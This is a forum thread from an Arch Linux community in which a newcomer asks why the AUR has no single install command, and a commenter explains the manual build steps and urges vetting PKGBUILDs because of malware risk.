this post was submitted on 08 Jan 2026
7 points (88.9% liked)

Arch Linux

452 readers
1 users here now

founded 2 years ago
MODERATORS
oxo@discuss.tchncs.de
7
Single command to install from the AUR (slrpnk.net)
submitted 4 days ago* (last edited 4 days ago) by FreeBeard@slrpnk.net to c/archlinux@discuss.tchncs.de
5 comments fedilink hide all child comments
 

Arch noob here: Is there a single command to install from the AUR? And if the answer is no, why not?

you are viewing a single comment's thread
view the rest of the comments
[–] kumi@feddit.online 5 points 4 days ago* (last edited 4 days ago) (1 children)

Read https://wiki.archlinux.org/title/Arch_User_Repository

"Installing from the AUR" usually means:

  • Cloning the AUR repo
  • Installing build dependencies
    • If any of those are AUR packages, recursively repeat
  • Download source files from arbitrary online location
  • Run arbitrary commands to build
  • Pack it all into a tarball
  • pacman -U the tarball

Anyone can easily register and upload AUR packages in seconds or minutes.

This makes it a high-risk vector for malware and there is indeed malware uploaded to the AUR all the time. Looking at the NPM malware development, the increased popularity of Linux, and the already ongoing cyberattacks on AUR itself, this will only get worse.

The idea is that you are expected to manually inspect and vet the PKGBUILD yourself by doing these steps before you run makepkg itself. With great power comes great responsibility. Developers realize that it is not responsible to make a tool specifically designed to make dangerous behavior and explicitly bypassing safeguards, stopgaps and best-practice protocols more convenient than the alternative, when it will be targeted to uneducated users.

As wltr mentioned, there are helpers, but you really should pick one that involves that manual inspection (like aurutils), and after becoming comfortable enough with git+makepkg+pacman to make it routine.

TLDR: If you can't or won't vet PKGBUILDs of AUR packages you shouldn't be blindly installing them.

[–] FreeBeard@slrpnk.net 1 points 4 days ago (1 children)

So it's a safety measure for people like me? That implies that I am capable of recognising malicious software. It seems like I've got even more reading to do.

Thank you for the explanation.

[–] kumi@feddit.online 2 points 4 days ago* (last edited 4 days ago)

In one way I think so, yes.

Many people obviously offload trust to the community to some extent, (probably much more than we should, reflected in popularity of helpers like the one you asked for), which involves the AUR discussions and votes, and the Arch wiki.

Sometimes a flatpak or container image, or straight up compiling from instructions, is the easier answer.

Have fun and be careful but curious out there! How obscure AUR packages you will be able deal with safely depends on your level of ambition.